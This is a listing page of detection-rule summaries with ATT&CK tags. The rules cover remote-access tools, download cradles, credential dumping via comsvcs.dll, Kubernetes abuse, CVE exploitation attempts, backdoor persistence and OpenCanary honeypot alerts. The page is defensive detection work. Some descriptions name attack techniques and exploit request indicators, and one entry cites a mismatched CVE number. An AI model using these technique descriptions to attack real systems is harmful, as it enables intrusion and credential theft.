    calendar Mar 4, 2025 · attack.persistence attack.command-and-control attack.t1219  ·
    Share on: twitter facebook linkedin copy

    Detects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel.


    Read More
  • Suspicious Binary Writes Via AnyDesk

    calendar Mar 4, 2025 · attack.command-and-control attack.t1219  ·
    Share on: twitter facebook linkedin copy

    Detects AnyDesk writing binary files to disk other than "gcapi.dll". According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)


    Read More
  • Nslookup PowerShell Download Cradle

    calendar Mar 4, 2025 · attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects a powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records.


    Read More
  • HTTP Request to Low Reputation TLD or Suspicious File Extension

    calendar Mar 4, 2025 · attack.initial-access attack.command-and-control  ·
    Share on: twitter facebook linkedin copy

    Detects HTTP requests to low reputation TLDs (e.g. .xyz, .top, .ru) or ending in suspicious file extensions (.exe, .dll, .hta), which may indicate malicious activity.


    Read More
  • Backup Files Deleted

    calendar Feb 28, 2025 · attack.impact attack.t1490  ·
    Share on: twitter facebook linkedin copy

    Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.


    Read More
  • File Deleted Via Sysinternals SDelete

    calendar Feb 28, 2025 · attack.defense-evasion attack.t1070.004  ·
    Share on: twitter facebook linkedin copy

    Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.


    Read More
  • Potential Obfuscated Ordinal Call Via Rundll32

    calendar Feb 25, 2025 · attack.defense-evasion attack.t1027.010  ·
    Share on: twitter facebook linkedin copy

    Detects execution of "rundll32" with potential obfuscated ordinal calls


    Read More
  • Process Memory Dump Via Comsvcs.DLL

    calendar Feb 25, 2025 · attack.defense-evasion attack.credential-access attack.t1036 attack.t1003.001 car.2013-05-009  ·
    Share on: twitter facebook linkedin copy

    Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)


    Read More
  • Potential CVE-2024-35250 Exploitation Activity

    calendar Feb 24, 2025 · attack.privilege-escalation attack.t1068 cve.2024-35250 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects potentially suspicious loading of "ksproxy.ax", which may indicate an attempt to exploit CVE-2024-35250.


    Read More
  • Clfs.SYS Loaded By Process Located In a Potential Suspicious Location

    calendar Feb 22, 2025 · attack.execution attack.t1059  ·
    Share on: twitter facebook linkedin copy

    Detects Clfs.sys being loaded by a process running from a potentially suspicious location. Clfs.sys is loaded as part of many CVEs exploits that targets Common Log File.


    Read More
  • Python Inline Command Execution

    calendar Feb 22, 2025 · attack.execution attack.t1059  ·
    Share on: twitter facebook linkedin copy

    Detects execution of python using the "-c" flag. This is could be used as a way to launch a reverse shell or execute live python code.


    Read More
  • Suspicious Non-Browser Network Communication With Google API

    calendar Feb 22, 2025 · attack.command-and-control attack.t1102  ·
    Share on: twitter facebook linkedin copy

    Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)


    Read More
  • Windows Event Log Access Tampering Via Registry

    calendar Feb 17, 2025 · attack.t1547.001 attack.t1112  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the Windows EventLog channel permission values. It focuses on changes to the Security Descriptor Definition Language (SDDL) string, as modifications to these values can restrict access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel. Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil".


    Read More
  • Kalambur Backdoor Curl TOR SOCKS Proxy Execution

    calendar Feb 17, 2025 · attack.command-and-control attack.t1090 attack.t1573 attack.t1071.001 attack.t1059.001 attack.s0183 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of the "curl.exe" command, referencing "SOCKS" and ".onion" domains, which could be indicative of Kalambur backdoor activity.


    Read More
  • AADInternals PowerShell Cmdlets Execution - ProccessCreation

    calendar Feb 17, 2025 · attack.execution attack.reconnaissance attack.discovery attack.credential-access attack.impact  ·
    Share on: twitter facebook linkedin copy

    Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.


    Read More
  • AADInternals PowerShell Cmdlets Execution - PsScript

    calendar Feb 17, 2025 · attack.execution attack.reconnaissance attack.discovery attack.credential-access attack.impact  ·
    Share on: twitter facebook linkedin copy

    Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.


    Read More
  • PUA - NimScan Execution

    calendar Feb 17, 2025 · attack.discovery attack.t1046  ·
    Share on: twitter facebook linkedin copy

    Detects usage of NimScan, a portscanner utility. In early 2025, adversaries were observed using this utility to scan for open ports on remote hosts in a compromised environment. This rule identifies the execution of NimScan based on the process image name and specific hash values associated with different versions of the tool.


    Read More
  • Schtasks Creation Or Modification With SYSTEM Privileges

    calendar Feb 17, 2025 · attack.execution attack.persistence attack.t1053.005  ·
    Share on: twitter facebook linkedin copy

    Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges


    Read More
  • Add Port Monitor Persistence in Registry

    calendar Feb 3, 2025 · attack.persistence attack.t1547.010  ·
    Share on: twitter facebook linkedin copy

    Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.


    Read More
  • Change Winevt Channel Access Permission Via Registry

    calendar Feb 3, 2025 · attack.defense-evasion attack.t1562.002  ·
    Share on: twitter facebook linkedin copy

    Detects tampering with the "ChannelAccess" registry key in order to change access to Windows event channel.


    Read More
  • Container With A hostPath Mount Created

    calendar Feb 3, 2025 · attack.t1611  ·
    Share on: twitter facebook linkedin copy

    Detects creation of a container with a hostPath mount. A hostPath volume mounts a directory or a file from the node to the container. Attackers who have permissions to create a new pod in the cluster may create one with a writable hostPath volume and chroot to escape to the underlying node.


    Read More
  • Creation Of Pod In System Namespace

    calendar Feb 3, 2025 · attack.t1036.005  ·
    Share on: twitter facebook linkedin copy

    Detects deployments of pods within the kube-system namespace, which could be intended to imitate system pods. System pods, created by controllers such as Deployments or DaemonSets have random suffixes in their names. Attackers can use this fact and name their backdoor pods as if they were created by these controllers to avoid detection. Deployment of such a backdoor container e.g. named kube-proxy-bv61v, could be attempted in the kube-system namespace alongside the other administrative containers.


    Read More
  • CVE-2024-1212 Exploitation - Progress Kemp LoadMaster Unauthenticated Command Injection

    calendar Feb 3, 2025 · attack.initial-access cve.2024-1212 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects potential exploitation of CVE-2024-1709 an unauthenticated command injection in Progress Kemp LoadMaster. It looks for GET requests to '/access/set' API with the parameters 'param=enableapi' and 'value=1' as well as an "Authorization" header with a base64 encoded value with an uncommon character.


    Read More
  • Deployment Deleted From Kubernetes Cluster

    calendar Feb 3, 2025 · attack.t1498  ·
    Share on: twitter facebook linkedin copy

    Detects the removal of a deployment from a Kubernetes cluster. This could indicate disruptive activity aiming to impact business operations.


    Read More
  • Disable Windows Event Logging Via Registry

    calendar Feb 3, 2025 · attack.defense-evasion attack.t1562.002  ·
    Share on: twitter facebook linkedin copy

    Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel


    Read More
  • Displaying Hidden Files Feature Disabled

    calendar Feb 3, 2025 · attack.defense-evasion attack.t1564.001  ·
    Share on: twitter facebook linkedin copy

    Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files. This technique is abused by several malware families to hide their files from normal users.


    Read More
  • EVTX Created In Uncommon Location

    calendar Feb 3, 2025 · attack.defense-evasion attack.t1562.002  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of new files with the ".evtx" extension in non-common or non-standard location. This could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within. Note that backup software and legitimate administrator might perform similar actions during troubleshooting.


    Read More
  • Kernel Memory Dump Via LiveKD

    calendar Feb 3, 2025 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects execution of LiveKD with the "-m" flag to potentially dump the kernel memory


    Read More
  • Kubernetes Events Deleted

    calendar Feb 3, 2025 · attack.t1070  ·
    Share on: twitter facebook linkedin copy

    Detects when events are deleted in Kubernetes. An adversary may delete Kubernetes events in an attempt to evade detection.


    Read More
  • Kubernetes Secrets Enumeration

    calendar Feb 3, 2025 · attack.t1552.007  ·
    Share on: twitter facebook linkedin copy

    Detects enumeration of Kubernetes secrets.


    Read More
  • Loaded Module Enumeration Via Tasklist.EXE

    calendar Feb 3, 2025 · attack.t1003  ·
    Share on: twitter facebook linkedin copy

    Detects the enumeration of a specific DLL or EXE being used by a binary via "tasklist.exe". This is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question. In order to dump the process memory or perform other nefarious actions.


    Read More
  • MaxMpxCt Registry Value Changed

    calendar Feb 3, 2025 · attack.defense-evasion attack.t1070.005  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the "MaxMpxCt" registry value. MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate. Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic.


    Read More
  • New Kubernetes Service Account Created

    calendar Feb 3, 2025 · attack.t1136  ·
    Share on: twitter facebook linkedin copy

    Detects creation of new Kubernetes service account, which could indicate an attacker's attempt to persist within a cluster.


    Read More
  • New TimeProviders Registered With Uncommon DLL Name

    calendar Feb 3, 2025 · attack.persistence attack.privilege-escalation attack.t1547.003  ·
    Share on: twitter facebook linkedin copy

    Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.


    Read More
  • OpenCanary - FTP Login Attempt

    calendar Feb 3, 2025 · attack.initial-access attack.exfiltration attack.t1190 attack.t1021  ·
    Share on: twitter facebook linkedin copy

    Detects instances where an FTP service on an OpenCanary node has had a login attempt.


    Read More
  • OpenCanary - GIT Clone Request

    calendar Feb 3, 2025 · attack.collection attack.t1213  ·
    Share on: twitter facebook linkedin copy

    Detects instances where a GIT service on an OpenCanary node has had Git Clone request.


    Read More
  • OpenCanary - HTTP GET Request

    calendar Feb 3, 2025 · attack.initial-access attack.t1190  ·
    Share on: twitter facebook linkedin copy

    Detects instances where an HTTP service on an OpenCanary node has received a GET request.


    Read More
  • OpenCanary - HTTP POST Login Attempt

    calendar Feb 3, 2025 · attack.initial-access attack.t1190  ·
    Share on: twitter facebook linkedin copy

    Detects instances where an HTTP service on an OpenCanary node has had login attempt via Form POST.


    Read More
  • OpenCanary - HTTPPROXY Login Attempt

    calendar Feb 3, 2025 · attack.initial-access attack.defense-evasion attack.t1090  ·
    Share on: twitter facebook linkedin copy

    Detects instances where an HTTPPROXY service on an OpenCanary node has had an attempt to proxy another page.


    Read More
  • OpenCanary - MSSQL Login Attempt Via SQLAuth

    calendar Feb 3, 2025 · attack.credential-access attack.collection attack.t1003 attack.t1213  ·
    Share on: twitter facebook linkedin copy

    Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using SQLAuth.


    Read More
  • OpenCanary - MSSQL Login Attempt Via Windows Authentication

    calendar Feb 3, 2025 · attack.credential-access attack.collection attack.t1003 attack.t1213  ·
    Share on: twitter facebook linkedin copy

    Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using Windows Authentication.


    Read More
  • OpenCanary - MySQL Login Attempt

    calendar Feb 3, 2025 · attack.credential-access attack.collection attack.t1003 attack.t1213  ·
    Share on: twitter facebook linkedin copy

    Detects instances where a MySQL service on an OpenCanary node has had a login attempt.


    Read More
  • OpenCanary - NTP Monlist Request

    calendar Feb 3, 2025 · attack.impact attack.t1498  ·
    Share on: twitter facebook linkedin copy

    Detects instances where an NTP service on an OpenCanary node has had a NTP monlist request.


    Read More
  • OpenCanary - REDIS Action Command Attempt

    calendar Feb 3, 2025 · attack.credential-access attack.collection attack.t1003 attack.t1213  ·
    Share on: twitter facebook linkedin copy

    Detects instances where a REDIS service on an OpenCanary node has had an action command attempted.


    Read More
  • OpenCanary - SIP Request

    calendar Feb 3, 2025 · attack.collection attack.t1123  ·
    Share on: twitter facebook linkedin copy

    Detects instances where an SIP service on an OpenCanary node has had a SIP request.


    Read More
  • OpenCanary - SMB File Open Request

    calendar Feb 3, 2025 · attack.lateral-movement attack.collection attack.t1021 attack.t1005  ·
    Share on: twitter facebook linkedin copy

    Detects instances where an SMB service on an OpenCanary node has had a file open request.


    Read More
  • OpenCanary - SNMP OID Request

    calendar Feb 3, 2025 · attack.discovery attack.lateral-movement attack.t1016 attack.t1021  ·
    Share on: twitter facebook linkedin copy

    Detects instances where an SNMP service on an OpenCanary node has had an OID request.


    Read More
  • OpenCanary - SSH Login Attempt

    calendar Feb 3, 2025 · attack.initial-access attack.lateral-movement attack.persistence attack.t1133 attack.t1021 attack.t1078  ·
    Share on: twitter facebook linkedin copy

    Detects instances where an SSH service on an OpenCanary node has had a login attempt.


    Read More
  • OpenCanary - SSH New Connection Attempt

    calendar Feb 3, 2025 · attack.initial-access attack.lateral-movement attack.persistence attack.t1133 attack.t1021 attack.t1078  ·
    Share on: twitter facebook linkedin copy

    Detects instances where an SSH service on an OpenCanary node has had a connection attempt.


    Read More
  • OpenCanary - Telnet Login Attempt

    calendar Feb 3, 2025 · attack.initial-access attack.command-and-control attack.t1133 attack.t1078  ·
    Share on: twitter facebook linkedin copy

    Detects instances where a Telnet service on an OpenCanary node has had a login attempt.


    Read More
  • OpenCanary - TFTP Request

    calendar Feb 3, 2025 · attack.exfiltration attack.t1041  ·
    Share on: twitter facebook linkedin copy

    Detects instances where a TFTP service on an OpenCanary node has had a request.


    Read More
  • OpenCanary - VNC Connection Attempt

    calendar Feb 3, 2025 · attack.lateral-movement attack.t1021  ·
    Share on: twitter facebook linkedin copy

    Detects instances where a VNC service on an OpenCanary node has had a connection attempt.


    Read More
  • Potential KamiKakaBot Activity - Lure Document Execution

    calendar Feb 3, 2025 · attack.execution attack.t1059 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of a Word document via the WinWord Start Menu shortcut. This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection.


    Read More
  • Potential KamiKakaBot Activity - Shutdown Schedule Task Creation

    calendar Feb 3, 2025 · attack.persistence detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of a schedule task that runs weekly and execute the "shutdown /l /f" command. This behavior was observed being used by KamiKakaBot samples in order to achieve persistence on a system.


    Read More
  • Potential KamiKakaBot Activity - Winlogon Shell Persistence

    calendar Feb 3, 2025 · attack.persistence attack.t1547.001 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the "Winlogon" registry key where a process will set the value of the "Shell" to a value that was observed being used by KamiKakaBot samples in order to achieve persistence.


    Read More
  • Potential Remote Command Execution In Pod Container

    calendar Feb 3, 2025 · attack.t1609  ·
    Share on: twitter facebook linkedin copy

    Detects attempts to execute remote commands, within a Pod's container using e.g. the "kubectl exec" command.


    Read More
  • Potential Sidecar Injection Into Running Deployment

    calendar Feb 3, 2025 · attack.t1609  ·
    Share on: twitter facebook linkedin copy

    Detects attempts to inject a sidecar container into a running deployment. A sidecar container is an additional container within a pod, that resides alongside the main container. One way to add containers to running resources like Deployments/DeamonSets/StatefulSets, is via a "kubectl patch" operation. By injecting a new container within a legitimate pod, an attacker can run their code and hide their activity, instead of running their own separated pod in the cluster.


    Read More
  • Potentially Suspicious CMD Shell Output Redirect

    calendar Feb 3, 2025 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location. This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.


    Read More
  • Privileged Container Deployed

    calendar Feb 3, 2025 · attack.t1611  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of a "privileged" container, an action which could be indicative of a threat actor mounting a container breakout attacks. A privileged container is a container that can access the host with all of the root capabilities of the host machine. This allows it to view, interact and modify processes, network operations, IPC calls, the file system, mount points, SELinux configurations etc. as the root user on the host. Various versions of "privileged" containers can be specified, e.g. by setting the securityContext.privileged flag in the resource specification, setting non-standard Linux capabilities, or configuring the hostNetwork/hostPID fields


    Read More
  • RBAC Permission Enumeration Attempt

    calendar Feb 3, 2025 · attack.t1069.003 attack.t1087.004  ·
    Share on: twitter facebook linkedin copy

    Detects identities attempting to enumerate their Kubernetes RBAC permissions. In the early stages of a breach, attackers will aim to list the permissions they have within the compromised environment. In a Kubernetes cluster, this can be achieved by interacting with the API server, and querying the SelfSubjectAccessReview API via e.g. a "kubectl auth can-i --list" command. This will enumerate the Role-Based Access Controls (RBAC) rules defining the compromised user's authorization.


    Read More
  • Register New IFiltre For Persistence

    calendar Feb 3, 2025 · attack.persistence  ·
    Share on: twitter facebook linkedin copy

    Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files.


    Read More
  • Registry Persistence via Service in Safe Mode

    calendar Feb 3, 2025 · attack.defense-evasion attack.t1564.001  ·
    Share on: twitter facebook linkedin copy

    Detects the modification of the registry to allow a driver or service to persist in Safe Mode.


    Read More
  • Remote Access Tool - Team Viewer Session Started On Linux Host

    calendar Feb 3, 2025 · attack.initial-access attack.t1133  ·
    Share on: twitter facebook linkedin copy

    Detects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.


    Read More
  • Remote Access Tool - Team Viewer Session Started On MacOS Host

    calendar Feb 3, 2025 · attack.initial-access attack.t1133  ·
    Share on: twitter facebook linkedin copy

    Detects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.


    Read More
  • Remote Access Tool - Team Viewer Session Started On Windows Host

    calendar Feb 3, 2025 · attack.initial-access attack.t1133  ·
    Share on: twitter facebook linkedin copy

    Detects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.


    Read More
  • Renamed NirCmd.EXE Execution

    calendar Feb 3, 2025 · attack.execution attack.t1059 attack.defense-evasion attack.t1202  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields.


    Read More
  • Rundll32 Execution With Uncommon DLL Extension

    calendar Feb 3, 2025 · attack.defense-evasion attack.t1218.011  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of rundll32 with a command line that doesn't contain a common extension


    Read More
  • ServiceDll Hijack

    calendar Feb 3, 2025 · attack.persistence attack.privilege-escalation attack.t1543.003  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the "ServiceDLL" value related to a service in the registry. This is often used as a method of persistence.


    Read More
  • Suspicious Command Patterns In Scheduled Task Creation

    calendar Feb 3, 2025 · attack.execution attack.t1053.005  ·
    Share on: twitter facebook linkedin copy

    Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands


    Read More
  • Suspicious Network Connection to IP Lookup Service APIs

    calendar Feb 3, 2025 · attack.discovery attack.t1016  ·
    Share on: twitter facebook linkedin copy

    Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity.


    Read More
  • Suspicious Response File Execution Via Odbcconf.EXE

    calendar Feb 3, 2025 · attack.defense-evasion attack.t1218.008  ·
    Share on: twitter facebook linkedin copy

    Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension.


    Read More
  • Sysmon Driver Altitude Change

    calendar Feb 3, 2025 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects changes in Sysmon driver altitude value. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.


    Read More
  • Windows Defender Service Disabled - Registry

    calendar Feb 3, 2025 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry


    Read More
  • WCE wceaux.dll Access

    calendar Jan 31, 2025 · attack.credential-access attack.t1003 attack.s0005  ·
    Share on: twitter facebook linkedin copy

    Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host


    Read More
  • CVE-2023-1389 Potential Exploitation Attempt - Unauthenticated Command Injection In TP-Link Archer AX21

    calendar Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-1389 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects potential exploitation attempt of CVE-2023-1389 an Unauthenticated Command Injection in TP-Link Archer AX21.


    Read More
  • CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)

    calendar Jan 30, 2025 · attack.execution attack.t1059 attack.initial-access attack.t1190 cve.2023-22518 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.


    Read More
  • CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows)

    calendar Jan 30, 2025 · attack.execution attack.t1059 attack.initial-access attack.t1190 cve.2023-22518 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.


    Read More
  • CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Proxy)

    calendar Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-22518 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.


    Read More
  • CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Webserver)

    calendar Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-22518 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands.


    Read More
  • CVE-2023-46747 Exploitation Activity - Proxy

    calendar Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-46747 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects exploitation activity of CVE-2023-46747 an unauthenticated remote code execution vulnerability in F5 BIG-IP.


    Read More
  • CVE-2023-46747 Exploitation Activity - Webserver

    calendar Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-46747 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects exploitation activity of CVE-2023-46747 an unauthenticated remote code execution vulnerability in F5 BIG-IP.


    Read More
  • CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy

    calendar Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-4966 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via proxy logs by looking for a very long host header string.


    Read More
  • CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver

    calendar Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-4966 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via webserver logs by looking for a very long host header string.


    Read More
  • CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy

    calendar Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-4966 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects potential exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via proxy logs.


    Read More
  • CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver

    calendar Jan 30, 2025 · attack.initial-access attack.t1190 cve.2023-4966 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects potential exploitation attempt of CVE-2023-4966 a Citrix ADC and NetScaler Gateway sensitive information disclosure vulnerability via webserver logs.


    Read More
  • CVE-2024-1708 - ScreenConnect Path Traversal Exploitation

    calendar Jan 30, 2025 · attack.persistence cve.2024-1708 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708.


    Read More
  • CVE-2024-1708 - ScreenConnect Path Traversal Exploitation - Security

    calendar Jan 30, 2025 · attack.initial-access attack.persistence cve.2024-1708 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    This detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708. This requires an Advanced Auditing policy to log a successful Windows Event ID 4663 events and with a SACL set on the directory.


    Read More
  • CVE-2024-1709 - ScreenConnect Authentication Bypass Exploitation

    calendar Jan 30, 2025 · attack.initial-access attack.persistence cve.2024-1709 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects GET requests to '/SetupWizard.aspx/[anythinghere]' that indicate exploitation of the ScreenConnect vulnerability CVE-2024-1709.


    Read More
  • CVE-2024-50623 Exploitation Attempt - Cleo

    calendar Jan 30, 2025 · attack.execution attack.t1190 cve.2024-50623 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects exploitation attempt of Cleo's CVE-2024-50623 by looking for a "cmd.exe" process spawning from the Celo software suite with suspicious Powershell commandline.


    Read More
  • Exploitation Attempt Of CVE-2023-46214 Using Public POC Code

    calendar Jan 30, 2025 · attack.lateral-movement attack.t1210 cve.2023-46214 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects exploitation attempt of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing using known public proof of concept code


    Read More
  • File Creation Related To RAT Clients

    calendar Jan 30, 2025 · attack.execution detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    File .conf created related to VenomRAT, AsyncRAT and Lummac samples observed in the wild.


    Read More
  • Forest Blizzard APT - File Creation Activity

    calendar Jan 30, 2025 · attack.defense-evasion attack.t1562.002 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of specific files inside of ProgramData directory. These files were seen being created by Forest Blizzard as described by MSFT.


    Read More
  • Forest Blizzard APT - Process Creation Activity

    calendar Jan 30, 2025 · attack.defense-evasion attack.execution detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of specific processes and command line combination. These were seen being created by Forest Blizzard as described by MSFT.


    Read More
  • Kapeka Backdoor Autorun Persistence

    calendar Jan 30, 2025 · attack.persistence attack.t1547.001 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the setting of a new value in the Autorun key that is used by the Kapeka backdoor for persistence.


    Read More
  • Kapeka Backdoor Configuration Persistence

    calendar Jan 30, 2025 · attack.persistence attack.defense-evasion attack.t1553.003 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects registry set activity of a value called "Seed" stored in the "\Cryptography\Providers" registry key. The Kapeka backdoor leverages this location to register a new SIP provider for backdoor configuration persistence.


    Read More
  • Kapeka Backdoor Execution Via RunDLL32.EXE

    calendar Jan 30, 2025 · attack.defense-evasion attack.t1218.011 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects Kapeka backdoor process execution pattern, where the dropper launch the backdoor binary by calling rundll32 and passing the backdoor's first export ordinal (#1) with a "-d" argument.


    Read More
  • Kapeka Backdoor Loaded Via Rundll32.EXE

    calendar Jan 30, 2025 · attack.execution attack.t1204.002 attack.defense-evasion attack.t1218.011 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the Kapeka Backdoor binary being loaded by rundll32.exe. The Kapeka loader drops a backdoor, which is a DLL with the '.wll' extension masquerading as a Microsoft Word Add-In.


    Read More
  • Kapeka Backdoor Persistence Activity

    calendar Jan 30, 2025 · attack.persistence attack.t1053.005 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects Kapeka backdoor persistence activity. Depending on the process privileges, the Kapeka dropper then sets persistence for the backdoor either as a scheduled task (if admin or SYSTEM) or autorun registry (if not). For the scheduled task, it creates a scheduled task called "Sens Api" via schtasks command, which is set to run upon system startup as SYSTEM. To establish persistence through the autorun utility, it adds an autorun entry called "Sens Api" under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run via the "reg add" command. Both persistence mechanisms are set to launch the binary by calling rundll32 and passing the backdoor's first export ordinal (#1) without any additional argument.


    Read More
  • Kapeka Backdoor Scheduled Task Creation

    calendar Jan 30, 2025 · attack.execution attack.privilege-escalation attack.persistence attack.t1053.005 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

